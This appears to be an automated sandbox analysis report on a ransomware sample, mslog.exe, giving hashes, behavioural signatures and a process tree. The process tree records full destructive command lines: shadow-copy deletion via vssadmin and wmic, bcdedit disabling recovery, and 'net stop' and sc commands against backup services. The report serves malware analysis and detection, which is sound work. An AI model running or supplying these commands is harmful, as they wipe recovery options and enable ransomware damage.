Analysis
-
max time kernel
661s -
max time network
403s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
03-10-2021 19:24
Static task
static1
Behavioral task
behavioral1
Sample
mslog.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
mslog.exe
Resource
win10v20210408
General
-
Target
mslog.exe
-
Size
9.7MB
-
MD5
f203e938be3fe17ebf389ade9c6b2c9e
-
SHA1
85c697602efae829e8765a671b36e705a7c96662
-
SHA256
f0676c64a2f27a02d7947ad41eecfcd9fde5b47ea8fcb9be2a3838cb7dc86128
-
SHA512
fcb03c204577fc655361610ee27db83eb87a18ed17291055ef0c94de9df5de18e0624972ab4148cc6d3c2ffbcd5e63cc6ceb59292fd468687fac935bafff0030
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1236 bcdedit.exe 376 bcdedit.exe -
Modifies extensions of user files 22 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
mslog.execmd.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\ImportEnter.raw.back_up mslog.exe File opened for modification C:\Users\Admin\Pictures\RenameGroup.raw.back_up mslog.exe File renamed C:\Users\Admin\Pictures\ResetRead.raw => C:\Users\Admin\Pictures\ResetRead.raw.back_up File opened for modification C:\Users\Admin\Pictures\BlockImport.tiff.back_up mslog.exe File renamed C:\Users\Admin\Pictures\DebugTrace.tif => C:\Users\Admin\Pictures\DebugTrace.tif.back_up File renamed C:\Users\Admin\Pictures\InstallClear.crw => C:\Users\Admin\Pictures\InstallClear.crw.back_up File renamed C:\Users\Admin\Pictures\MoveSave.crw => C:\Users\Admin\Pictures\MoveSave.crw.back_up File opened for modification C:\Users\Admin\Pictures\ResetGroup.png.back_up mslog.exe File opened for modification C:\Users\Admin\Pictures\ResetRead.raw.back_up mslog.exe File opened for modification C:\Users\Admin\Pictures\SetDisconnect.png.back_up mslog.exe File opened for modification C:\Users\Admin\Pictures\DebugTrace.tif.back_up mslog.exe File renamed C:\Users\Admin\Pictures\GrantMount.tif => C:\Users\Admin\Pictures\GrantMount.tif.back_up File renamed C:\Users\Admin\Pictures\ResetGroup.png => C:\Users\Admin\Pictures\ResetGroup.png.back_up File renamed C:\Users\Admin\Pictures\SetDisconnect.png => C:\Users\Admin\Pictures\SetDisconnect.png.back_up File renamed C:\Users\Admin\Pictures\BlockImport.tiff => C:\Users\Admin\Pictures\BlockImport.tiff.back_up cmd.exe File opened for modification C:\Users\Admin\Pictures\InstallClear.crw.back_up mslog.exe File opened for modification C:\Users\Admin\Pictures\MoveSave.crw.back_up mslog.exe File renamed C:\Users\Admin\Pictures\RenameGroup.raw => C:\Users\Admin\Pictures\RenameGroup.raw.back_up File renamed C:\Users\Admin\Pictures\SearchSelect.tif => C:\Users\Admin\Pictures\SearchSelect.tif.back_up File opened for modification C:\Users\Admin\Pictures\SearchSelect.tif.back_up mslog.exe File opened for modification C:\Users\Admin\Pictures\GrantMount.tif.back_up mslog.exe File renamed C:\Users\Admin\Pictures\ImportEnter.raw => C:\Users\Admin\Pictures\ImportEnter.raw.back_up -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI6642\python39.dll upx \Users\Admin\AppData\Local\Temp\_MEI6642\python39.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI6642\_ctypes.pyd upx \Users\Admin\AppData\Local\Temp\_MEI6642\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI6642\libffi-7.dll upx \Users\Admin\AppData\Local\Temp\_MEI6642\libffi-7.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI6642\_socket.pyd upx \Users\Admin\AppData\Local\Temp\_MEI6642\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI6642\select.pyd upx \Users\Admin\AppData\Local\Temp\_MEI6642\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI6642\pywintypes39.dll upx \Users\Admin\AppData\Local\Temp\_MEI6642\pywintypes39.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI6642\_bz2.pyd upx \Users\Admin\AppData\Local\Temp\_MEI6642\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI6642\_lzma.pyd upx \Users\Admin\AppData\Local\Temp\_MEI6642\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI6642\win32api.pyd upx \Users\Admin\AppData\Local\Temp\_MEI6642\win32api.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI6642\pythoncom39.dll upx \Users\Admin\AppData\Local\Temp\_MEI6642\pythoncom39.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI6642\_pytransform.dll upx \Users\Admin\AppData\Local\Temp\_MEI6642\_pytransform.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI6642\psutil\_psutil_windows.cp39-win_amd64.pyd upx \Users\Admin\AppData\Local\Temp\_MEI6642\psutil\_psutil_windows.cp39-win_amd64.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI23882\python39.dll upx \Users\Admin\AppData\Local\Temp\_MEI23882\python39.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI23882\_ctypes.pyd upx \Users\Admin\AppData\Local\Temp\_MEI23882\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI23882\libffi-7.dll upx \Users\Admin\AppData\Local\Temp\_MEI23882\libffi-7.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI23882\_socket.pyd upx \Users\Admin\AppData\Local\Temp\_MEI23882\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI23882\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI23882\pywintypes39.dll upx \Users\Admin\AppData\Local\Temp\_MEI23882\select.pyd upx \Users\Admin\AppData\Local\Temp\_MEI23882\pywintypes39.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI23882\_bz2.pyd upx \Users\Admin\AppData\Local\Temp\_MEI23882\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI23882\_lzma.pyd upx \Users\Admin\AppData\Local\Temp\_MEI23882\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI23882\win32api.pyd upx \Users\Admin\AppData\Local\Temp\_MEI23882\win32api.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI23882\pythoncom39.dll upx \Users\Admin\AppData\Local\Temp\_MEI23882\pythoncom39.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI23882\_pytransform.dll upx \Users\Admin\AppData\Local\Temp\_MEI23882\_pytransform.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI23882\psutil\_psutil_windows.cp39-win_amd64.pyd upx \Users\Admin\AppData\Local\Temp\_MEI23882\psutil\_psutil_windows.cp39-win_amd64.pyd upx -
Loads dropped DLL 26 IoCs
Processes:
mslog.exemslog.exepid process 424 mslog.exe 424 mslog.exe 424 mslog.exe 424 mslog.exe 424 mslog.exe 424 mslog.exe 424 mslog.exe 424 mslog.exe 424 mslog.exe 424 mslog.exe 424 mslog.exe 424 mslog.exe 424 mslog.exe 3800 mslog.exe 3800 mslog.exe 3800 mslog.exe 3800 mslog.exe 3800 mslog.exe 3800 mslog.exe 3800 mslog.exe 3800 mslog.exe 3800 mslog.exe 3800 mslog.exe 3800 mslog.exe 3800 mslog.exe 3800 mslog.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
mslog.exemslog.exepid process 424 mslog.exe 3800 mslog.exe -
Drops file in Program Files directory 64 IoCs
Processes:
mslog.exedescription ioc process File opened for modification C:\Program Files\7-Zip\History.txt.back_up mslog.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZY______.PFB.back_up mslog.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt.back_up mslog.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-phn.xrm-ms.back_up mslog.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\README_en_US.txt.back_up mslog.exe File opened for modification C:\Program Files\SplitDisconnect.rtf.back_up mslog.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt.back_up mslog.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt.back_up mslog.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee90.tlb.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\AdjacencyReport.dotx.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\officemuiset.msi.16.en-us.vreg.dat.back_up mslog.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt.back_up mslog.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d.back_up mslog.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html.back_up mslog.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_cs.jar.back_up mslog.exe File opened for modification C:\Program Files\SwitchReset.MOD.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE.back_up mslog.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets.back_up mslog.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\LICENSE.back_up mslog.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME-JAVAFX.txt.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\dcf.x-none.msi.16.x-none.tree.dat.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.back_up mslog.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css.back_up mslog.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\index.html.back_up mslog.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\jaccess.jar.back_up mslog.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\en_GB.dic.back_up mslog.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.excelmui.msi.16.en-us.xml.back_up mslog.exe File opened for modification C:\Program Files\ClearConvertTo.temp.back_up mslog.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt.back_up mslog.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd.otf.back_up mslog.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\javafx-src.zip.back_up mslog.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT.back_up mslog.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jawt.h.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\fre\StartMenu_Win8.mp4.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\excelmui.msi.16.en-us.vreg.dat.back_up mslog.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml.back_up mslog.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri-Cambria.xml.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-oob.xrm-ms.back_up mslog.exe File opened for modification C:\Program Files\7-Zip\Lang\hy.txt.back_up mslog.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT.back_up mslog.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\MySharePoints.ico.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\office32ww.msi.16.x-none.tree.dat.back_up mslog.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api.back_up mslog.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\en_US.dic.back_up mslog.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\Bibliography\BIBFORM.XML.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.dll.config.back_up mslog.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntime2019R_PrepidBypass-ppd.xrm-ms.back_up mslog.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf.back_up mslog.exe File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Retail-pl.xrm-ms.back_up mslog.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\PYCC.pf.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\BloodPressureTracker.xltx.back_up mslog.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\POWERMAPCLASSIFICATION.DLL.back_up mslog.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-It.otf.back_up mslog.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Bold.otf.back_up mslog.exe File opened for modification C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\pkeyconfig-office.xrm-ms.back_up mslog.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT.back_up mslog.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist.back_up mslog.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3292 vssadmin.exe -
Kills process with taskkill 44 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 244 taskkill.exe 836 taskkill.exe 3380 taskkill.exe 3848 taskkill.exe 3708 taskkill.exe 2796 taskkill.exe 1912 taskkill.exe 376 taskkill.exe 1504 taskkill.exe 1776 taskkill.exe 628 taskkill.exe 3768 taskkill.exe 2480 taskkill.exe 3944 taskkill.exe 1628 taskkill.exe 1036 taskkill.exe 1180 taskkill.exe 712 taskkill.exe 1328 taskkill.exe 1388 taskkill.exe 688 taskkill.exe 1960 taskkill.exe 2700 taskkill.exe 1280 taskkill.exe 2304 taskkill.exe 1660 taskkill.exe 2480 taskkill.exe 1720 taskkill.exe 2540 taskkill.exe 3040 taskkill.exe 3004 taskkill.exe 3736 taskkill.exe 3520 taskkill.exe 1708 taskkill.exe 240 taskkill.exe 1660 taskkill.exe 744 taskkill.exe 3772 taskkill.exe 1176 taskkill.exe 1720 taskkill.exe 1960 taskkill.exe 1168 taskkill.exe 2164 taskkill.exe 488 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 3044 powershell.exe 3044 powershell.exe 3044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
mslog.exepowershell.exemslog.exewmic.exevssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 424 mslog.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeDebugPrivilege 3800 mslog.exe Token: SeIncreaseQuotaPrivilege 2796 wmic.exe Token: SeSecurityPrivilege 2796 wmic.exe Token: SeTakeOwnershipPrivilege 2796 wmic.exe Token: SeLoadDriverPrivilege 2796 wmic.exe Token: SeSystemProfilePrivilege 2796 wmic.exe Token: SeSystemtimePrivilege 2796 wmic.exe Token: SeProfSingleProcessPrivilege 2796 wmic.exe Token: SeIncBasePriorityPrivilege 2796 wmic.exe Token: SeCreatePagefilePrivilege 2796 wmic.exe Token: SeBackupPrivilege 2796 wmic.exe Token: SeRestorePrivilege 2796 wmic.exe Token: SeShutdownPrivilege 2796 wmic.exe Token: SeDebugPrivilege 2796 wmic.exe Token: SeSystemEnvironmentPrivilege 2796 wmic.exe Token: SeRemoteShutdownPrivilege 2796 wmic.exe Token: SeUndockPrivilege 2796 wmic.exe Token: SeManageVolumePrivilege 2796 wmic.exe Token: 33 2796 wmic.exe Token: 34 2796 wmic.exe Token: 35 2796 wmic.exe Token: 36 2796 wmic.exe Token: SeIncreaseQuotaPrivilege 2796 wmic.exe Token: SeSecurityPrivilege 2796 wmic.exe Token: SeTakeOwnershipPrivilege 2796 wmic.exe Token: SeLoadDriverPrivilege 2796 wmic.exe Token: SeSystemProfilePrivilege 2796 wmic.exe Token: SeSystemtimePrivilege 2796 wmic.exe Token: SeProfSingleProcessPrivilege 2796 wmic.exe Token: SeIncBasePriorityPrivilege 2796 wmic.exe Token: SeCreatePagefilePrivilege 2796 wmic.exe Token: SeBackupPrivilege 2796 wmic.exe Token: SeRestorePrivilege 2796 wmic.exe Token: SeShutdownPrivilege 2796 wmic.exe Token: SeDebugPrivilege 2796 wmic.exe Token: SeSystemEnvironmentPrivilege 2796 wmic.exe Token: SeRemoteShutdownPrivilege 2796 wmic.exe Token: SeUndockPrivilege 2796 wmic.exe Token: SeManageVolumePrivilege 2796 wmic.exe Token: 33 2796 wmic.exe Token: 34 2796 wmic.exe Token: 35 2796 wmic.exe Token: 36 2796 wmic.exe Token: SeBackupPrivilege 1680 vssvc.exe Token: SeRestorePrivilege 1680 vssvc.exe Token: SeAuditPrivilege 1680 vssvc.exe Token: SeDebugPrivilege 1912 taskkill.exe Token: SeDebugPrivilege 1708 taskkill.exe Token: SeDebugPrivilege 2480 taskkill.exe Token: SeDebugPrivilege 240 taskkill.exe Token: SeDebugPrivilege 1960 taskkill.exe Token: SeDebugPrivilege 3944 taskkill.exe Token: SeDebugPrivilege 2540 taskkill.exe Token: SeDebugPrivilege 376 taskkill.exe Token: SeDebugPrivilege 2164 taskkill.exe Token: SeDebugPrivilege 1628 taskkill.exe Token: SeDebugPrivilege 1168 taskkill.exe Token: SeDebugPrivilege 1720 taskkill.exe Token: SeDebugPrivilege 1776 taskkill.exe Token: SeDebugPrivilege 1660 taskkill.exe Token: SeDebugPrivilege 2700 taskkill.exe Token: SeDebugPrivilege 1280 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
mslog.exemslog.exepowershell.exemslog.exemslog.execmd.execmd.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 664 wrote to memory of 424 664 mslog.exe mslog.exe PID 664 wrote to memory of 424 664 mslog.exe mslog.exe PID 424 wrote to memory of 1408 424 mslog.exe cmd.exe PID 424 wrote to memory of 1408 424 mslog.exe cmd.exe PID 3044 wrote to memory of 2388 3044 powershell.exe mslog.exe PID 3044 wrote to memory of 2388 3044 powershell.exe mslog.exe PID 2388 wrote to memory of 3800 2388 mslog.exe mslog.exe PID 2388 wrote to memory of 3800 2388 mslog.exe mslog.exe PID 3800 wrote to memory of 996 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 996 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 2656 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 2656 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 2796 3800 mslog.exe wmic.exe PID 3800 wrote to memory of 2796 3800 mslog.exe wmic.exe PID 3800 wrote to memory of 3708 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 3708 3800 mslog.exe cmd.exe PID 3708 wrote to memory of 3292 3708 cmd.exe vssadmin.exe PID 3708 wrote to memory of 3292 3708 cmd.exe vssadmin.exe PID 3800 wrote to memory of 3372 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 3372 3800 mslog.exe cmd.exe PID 3372 wrote to memory of 1236 3372 cmd.exe bcdedit.exe PID 3372 wrote to memory of 1236 3372 cmd.exe bcdedit.exe PID 3372 wrote to memory of 376 3372 cmd.exe bcdedit.exe PID 3372 wrote to memory of 376 3372 cmd.exe bcdedit.exe PID 3800 wrote to memory of 3168 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 3168 3800 mslog.exe cmd.exe PID 3168 wrote to memory of 3040 3168 cmd.exe sc.exe PID 3168 wrote to memory of 3040 3168 cmd.exe sc.exe PID 3800 wrote to memory of 4048 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 4048 3800 mslog.exe cmd.exe PID 4048 wrote to memory of 2716 4048 cmd.exe net.exe PID 4048 wrote to memory of 2716 4048 cmd.exe net.exe PID 2716 wrote to memory of 1776 2716 net.exe net1.exe PID 2716 wrote to memory of 1776 2716 net.exe net1.exe PID 3800 wrote to memory of 1704 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 1704 3800 mslog.exe cmd.exe PID 1704 wrote to memory of 3380 1704 cmd.exe net.exe PID 1704 wrote to memory of 3380 1704 cmd.exe net.exe PID 3380 wrote to memory of 2496 3380 net.exe net1.exe PID 3380 wrote to memory of 2496 3380 net.exe net1.exe PID 3800 wrote to memory of 964 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 964 3800 mslog.exe cmd.exe PID 964 wrote to memory of 1716 964 cmd.exe net.exe PID 964 wrote to memory of 1716 964 cmd.exe net.exe PID 1716 wrote to memory of 420 1716 net.exe net1.exe PID 1716 wrote to memory of 420 1716 net.exe net1.exe PID 3800 wrote to memory of 3356 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 3356 3800 mslog.exe cmd.exe PID 3356 wrote to memory of 1032 3356 cmd.exe net.exe PID 3356 wrote to memory of 1032 3356 cmd.exe net.exe PID 1032 wrote to memory of 2372 1032 net.exe net1.exe PID 1032 wrote to memory of 2372 1032 net.exe net1.exe PID 3800 wrote to memory of 2020 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 2020 3800 mslog.exe cmd.exe PID 2020 wrote to memory of 4004 2020 cmd.exe net.exe PID 2020 wrote to memory of 4004 2020 cmd.exe net.exe PID 4004 wrote to memory of 4080 4004 net.exe net1.exe PID 4004 wrote to memory of 4080 4004 net.exe net1.exe PID 3800 wrote to memory of 2684 3800 mslog.exe cmd.exe PID 3800 wrote to memory of 2684 3800 mslog.exe cmd.exe PID 2684 wrote to memory of 2864 2684 cmd.exe net.exe PID 2684 wrote to memory of 2864 2684 cmd.exe net.exe PID 2864 wrote to memory of 252 2864 net.exe net1.exe PID 2864 wrote to memory of 252 2864 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\mslog.exe"C:\Users\Admin\AppData\Local\Temp\mslog.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mslog.exe"C:\Users\Admin\AppData\Local\Temp\mslog.exe"2⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command Set-Location -literalPath 'C:\Users\Admin\AppData\Local\Temp'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mslog.exe"C:\Users\Admin\AppData\Local\Temp\mslog.exe" j09f2jf90j2390fj 1 1 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mslog.exe"C:\Users\Admin\AppData\Local\Temp\mslog.exe" j09f2jf90j2390fj 1 1 03⤵
- Modifies extensions of user files
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵
-
C:\Windows\System32\Wbem\wmic.exewmic.exe Shadowcopy Delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c vssadmin.exe Delete Shadows /all /quiet4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c bcdedit /set {default} recoveryenabled No & bcdedit /set {default}4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default}5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc config "Netbackup Legacy Network service" start= disabled4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc config "Netbackup Legacy Network service" start= disabled5⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamDeploySvc /y4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet stop VeeamDeploySvc /y5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Acronis VSS Provider" /y4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet stop "Acronis VSS Provider" /y5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider" /y6⤵
-
C:\Windows\system32\net.exenet stop MSOLAP$SQL_2008 /y7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y8⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y8⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "SQL Backups /y4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet stop "SQL Backups /y5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "SQLsafe Backup Service" /y4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet stop "SQLsafe Backup Service" /y5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "SQLsafe Filter Service" /y4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet stop "SQLsafe Filter Service" /y5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Symantec System Recovery" /y4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet stop "Symantec System Recovery" /y5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Veeam Backup Catalog Data Service" /y4⤵
-
